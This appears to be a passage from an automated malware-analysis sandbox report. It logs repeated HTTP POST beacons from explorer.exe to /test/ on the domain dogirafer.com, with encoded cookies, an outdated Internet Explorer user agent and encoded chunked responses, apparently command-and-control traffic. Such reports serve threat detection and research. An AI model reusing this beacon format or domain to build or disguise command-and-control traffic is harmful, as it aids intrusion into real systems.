2024-12-03 16:46:26 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:28 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fe%2BUBROKIGxcWS%2FliGAUW8skJE7s8TjPR692cfzjbICu75YJFCyEQN4gEQuAmlMav6X1zNj4HTazxRixD7QXfPAypU9%2BmPs%2BlmmtysWKGHwhZZKRtiaNua9Wzpj6SeEx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5086999a47cee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1826&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1527995&cwnd=167&unsent_bytes=0&cid=7fbe694f3dd9f4c0&ts=1640&x=0"
2024-12-03 16:46:28 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 75 65 54 4d 47 37 33 59 70 76 5a 52 72 66 68 57 50 67 67 33 39 48 4f 30 72 58 44 43 48 43 62 50 36 32 76 69 2f 46 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 49 55 55 76 65 4a 62 6e 37 46 59 6e 43 4c 57 34 74 71 5a 47 74 5a 47 6d 70 63 6f 39 37 30 35 52 48 6d 4a 45 36 63 4f 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 78 42 2b 2f 69 4a 78 6c 2b 62 62 58 41 66 33 59 73 71 34 56 45 37 6c 54 64 41 48 5a 43 67 45 6b 34 4f 46 67 49 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 56 53 54 70 Data Ascii: 150OyueTMG73YpvZRrfhWPgg39HO0rXDCHCbP62vi/FYGmcphSGpB6yiJiVjA1vIUUveJbn7FYnCLW4tqZGtZGmpco9705RHmJE6cOjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwxB+/iJxl+bbXAf3Ysq4VE7lTdAHZCgEk4OFgIcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvVSTp
2024-12-03 16:46:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50037	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:29 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:31 UTC	781	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPGOJTYGH1N8bdbZB0RvvbyRsSrtOUiRsQB8ZfakFedx6xpWAAFAiEbT4Lc%2FaqB%2BWheU3qogKZOhQBytjtkgo96N9BjGhhK0jXZUaOXaPgvf7D3r8WE6ZSCQmD0GDaA9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5087c8e9b4244-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1623&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1769696&cwnd=218&unsent_bytes=0&cid=05b5d20c280a1ece&ts=1611&x=0"
2024-12-03 16:46:31 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 2b 5a 52 63 47 77 30 49 70 67 5a 78 7a 5a 68 32 50 6d 67 33 39 4b 4d 30 2f 51 42 43 50 43 62 66 71 37 76 53 54 45 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 6b 49 6f 63 35 76 6e 37 46 6b 67 41 4c 65 34 73 75 30 4a 73 35 53 74 6f 4d 6b 32 67 69 4a 51 46 47 52 4d 36 38 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 41 33 42 2b 76 72 49 48 4d 59 61 72 44 46 65 48 55 72 71 34 46 43 36 46 58 61 44 78 30 70 68 55 6b 34 4d 56 49 4f 50 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 52 54 35 Data Ascii: 150Oy+ZRcGw0IpgZxzZh2Pmg39KM0/QBCPCbfq7vSTEZmmcphSGpB6yiJiVjA1pIkIoc5vn7FkgALe4su0Js5StoMk2giJQFGRM68vsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EsA3B+vrIHMYarDFeHUrq4FC6FXaDx0phUk4MVIOPcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVRT5
2024-12-03 16:46:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50038	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:32 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:34 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vShW1Mk2WSUlhUXMGyAI%2BDwwQpgdA1DfuaGXwPSiHcTawio1DAYQSTIX%2FphMdB24myHwWmMy1gadvpTw8Q7o3mT48K9uVn55Ud3XGBDbJ0Tlfe7HD3hpA8%2BiX9mATSUq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5088f1d31f5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1482&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1912246&cwnd=252&unsent_bytes=0&cid=cc60c2aa4db641a0&ts=1635&x=0"
2024-12-03 16:46:34 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 69 75 63 51 38 4b 37 32 34 70 67 59 78 6e 62 68 6d 58 69 67 33 52 48 4d 30 6a 55 42 55 36 6c 62 2f 75 7a 76 53 58 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4a 6d 4a 45 34 6f 66 70 47 4f 67 56 34 6b 43 62 71 33 75 65 30 4d 74 35 4f 6e 70 73 45 37 67 69 4e 54 47 57 64 4e 35 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 47 47 38 38 34 41 65 2f 72 54 68 34 52 5a 4c 50 47 65 48 42 68 35 6f 64 45 35 6c 62 56 43 58 5a 43 68 55 6b 2f 4e 6c 34 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 50 56 56 51 70 Data Ascii: 150PiucQ8K724pgYxnbhmXig3RHM0jUBU6lb/uzvSXPKRib7xuPoA21j4bUizJmJE4ofpGOgV4kCbq3ue0Mt5OnpsE7giNTGWdN5o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzGG884Ae/rTh4RZLPGeHBh5odE5lbVCXZChUk/Nl4AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPPVVQp
2024-12-03 16:46:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50039	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:35 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:37 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUzbUX%2FfBO%2FN0WAKXiw8xkjwBfOirWrPD2%2FEwyaNfedexP8iv3RNBJ%2Bs785OiK7Cr9gQSa6N7xcjzIW8hF35iNviDPV558t42Hs0ydFr7LCIL4GdChjInfsNfYHkHPYL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec508a17bc86a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1764&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1600877&cwnd=202&unsent_bytes=0&cid=585e898979b7ec94&ts=1678&x=0"
2024-12-03 16:46:37 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4d 79 6d 59 54 63 43 33 33 49 70 6e 61 78 6e 5a 67 32 66 6b 67 33 64 4d 50 45 2f 65 44 43 6a 43 62 66 71 33 75 79 62 4e 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4a 6b 41 72 63 35 66 69 37 46 30 68 44 37 57 33 74 4b 4a 47 73 4a 47 6f 72 4d 30 34 35 55 35 51 47 57 4e 4b 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 45 63 77 7a 41 4f 33 6b 54 68 6f 58 5a 4c 58 49 65 6a 30 71 34 6f 56 46 36 56 58 55 5a 78 31 42 69 30 6f 38 4e 78 63 31 42 4f 6e 69 50 50 6a 56 45 48 69 59 50 6e 61 70 56 6a 65 4a 49 6c 38 58 4e 79 76 34 33 77 39 32 57 66 38 54 69 73 7a 5a 68 61 56 66 4d 34 33 6e 77 63 72 6a 50 2f 42 52 54 70 Data Ascii: 14cMymYTcC33IpnaxnZg2fkg3dMPE/eDCjCbfq3uybNY2mcphSGpB6yiJiVjA1vJkArc5fi7F0hD7W3tKJGsJGorM045U5QGWNK64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLEcwzAO3kThoXZLXIej0q4oVF6VXUZx1Bi0o8Nxc1BOniPPjVEHiYPnapVjeJIl8XNyv43w92Wf8TiszZhaVfM43nwcrjP/BRTp
2024-12-03 16:46:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50040	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:38 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:40 UTC	777	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDoDe0a0K66mPAelkrK8ldopLRMluCGVZg4M7rXaTy6WD85BzdIeFKCSOnqmw67zl2Tsc5dU2T1PPFAk9zhWFURMPNEPglCwjSUazdamnp47zAKpPF0Ulmx1X1bMASk0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec508b57ab04282-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1579&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1817050&cwnd=252&unsent_bytes=0&cid=d1092ce85d3dd269&ts=1635&x=0"
2024-12-03 16:46:40 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 69 75 56 52 73 71 79 33 6f 70 67 5a 52 37 64 68 57 44 6d 67 33 46 49 4f 45 37 58 41 55 36 71 5a 2f 61 32 76 53 44 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 42 6d 4c 6b 38 75 65 70 75 4f 67 46 6f 6d 44 37 4b 39 73 75 30 4f 75 35 4b 6d 70 63 6b 37 67 69 5a 55 48 32 46 46 37 73 4c 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 6f 33 42 65 2f 72 54 68 6f 51 61 4c 50 46 66 48 52 68 34 59 4e 48 37 56 66 62 44 58 5a 41 67 55 41 2f 4e 46 67 4e 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 46 54 52 5a Data Ascii: 150PiuVRsqy3opgZR7dhWDmg3FIOE7XAU6qZ/a2vSDPKRib7xuPoA21j4bUizBmLk8uepuOgFomD7K9su0Ou5Kmpck7giZUH2FF7sLsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Gso3Be/rThoQaLPFfHRh4YNH7VfbDXZAgUA/NFgNcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvFTRZ
2024-12-03 16:46:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50041	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:41 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:43 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6h5S6gDNEfWzyp3nZ3R20AhoyU9dX7dp03%2FXfgSyS0bxDts4U2cDWPbcGqOrmPu9GS0VWhlyYD%2FVbgVe5EXapbuUc6BAm0DMdq5BBkQnGdviCx48G%2BuRTI9DXLwb7Say"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec508c9cf210f9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1514&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1896103&cwnd=193&unsent_bytes=0&cid=59c6f91d0a804b99&ts=1601&x=0"
2024-12-03 16:46:43 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 43 57 5a 51 4d 71 36 33 59 70 68 61 78 7a 66 68 57 2f 6e 67 33 35 4c 50 45 50 54 44 43 58 43 61 2f 69 78 76 53 58 50 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 55 63 76 65 35 76 6c 37 46 6f 72 43 62 75 37 74 36 52 47 74 35 4f 72 6f 4d 38 34 37 30 35 56 48 6d 74 4e 37 73 71 6b 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 77 41 4f 4c 6b 49 52 70 2b 62 37 37 44 66 33 4d 6c 35 63 74 42 36 46 66 5a 43 52 68 47 37 45 45 30 4e 46 38 4c 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 52 61 52 5a Data Ascii: 150OCWZQMq63YphaxzfhW/ng35LPEPTDCXCa/ixvSXPYGmcphSGpB6yiJiVjA1nIUcve5vl7ForCbu7t6RGt5OroM84705VHmtN7sqkfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KckwAOLkIRp+b77Df3Ml5ctB6FfZCRhG7EE0NF8LcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNvRaRZ
2024-12-03 16:46:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50042	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:44 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:46 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cg%2FsplNSKJ%2B2hkGgHsaP3FIfiT0rQkiMmEa00ewNFOaxCLf1JNI1TdJcRBsfL%2FxCuOP%2BZyPnO9T9eByG7IseHK17OgLO1gMVHMnxBl4ekZchWGv8En0fVhoxj2MNw5tX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec508dc4df90fa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1473&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1894873&cwnd=252&unsent_bytes=0&cid=3edfb6797205d194&ts=1658&x=0"
2024-12-03 16:46:46 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 53 69 63 54 63 47 32 32 6f 70 6a 59 68 33 65 68 47 62 6f 67 33 4e 4f 4d 6b 6e 65 44 43 44 43 62 50 69 33 75 69 37 4c 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 49 6b 38 75 63 70 4c 6a 37 46 73 67 44 4c 43 33 73 4b 46 47 73 4a 4b 6e 70 63 38 32 67 69 56 63 47 47 46 4b 37 73 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 6f 77 41 2b 72 69 49 58 4d 57 61 62 66 43 65 33 51 6f 71 34 56 43 37 31 62 63 44 58 5a 4f 68 55 38 35 4d 46 31 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 68 50 76 4a 56 52 4a Data Ascii: 14cOSicTcG22opjYh3ehGbog3NOMkneDCDCbPi3ui7LbWmcphSGpB6yiJiVjA1rIk8ucpLj7FsgDLC3sKFGsJKnpc82giVcGGFK7svsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8owA+riIXMWabfCe3Qoq4VC71bcDXZOhU85MF1EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbhPvJVRJ
2024-12-03 16:46:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50043	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:47 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:49 UTC	787	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTi9oXFPJKCohXlDgHtOA3UbS76TUJ2UugBxYicTiM%2B%2Bnf%2FZ0eyiXu%2BzJDYgcoQpkaot%2FQHFw0YHTG4R30Yu71qHLo2bEC6V7tsOK8LDRqpCGzCKObEG4aGJdZErrMBp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec508ef6ff4436d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1706&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1505930&cwnd=159&unsent_bytes=0&cid=7b85bc71e4d92626&ts=1645&x=0"
2024-12-03 16:46:49 UTC	347	IN	Data Raw: 31 35 34 0d 0a 50 53 32 62 51 73 47 7a 30 49 70 75 61 78 6a 52 68 6d 54 67 67 33 46 4e 4f 55 7a 65 41 53 66 43 5a 76 2b 33 76 69 4c 4e 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 6b 55 6f 65 70 44 6a 37 46 38 6c 43 72 65 32 73 61 46 47 74 4a 75 73 6f 73 30 36 37 6b 35 53 47 57 74 46 37 73 61 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 77 44 4f 76 6c 4b 42 35 2b 61 72 54 43 65 33 67 6f 37 38 74 48 37 56 4c 55 41 52 70 42 37 45 30 2b 4e 46 34 49 4f 6f 54 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 52 4a Data Ascii: 154PS2bQsGz0IpuaxjRhmTgg3FNOUzeASfCZv+3viLNZ2mcphSGpB6yiJiVjA1mIkUoepDj7F8lCre2saFGtJusos067k5SGWtF7saifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc8wDOvlKB5+arTCe3go78tH7VLUARpB7E0+NF4IOoTMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aRJ
2024-12-03 16:46:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50044	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:46:50 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
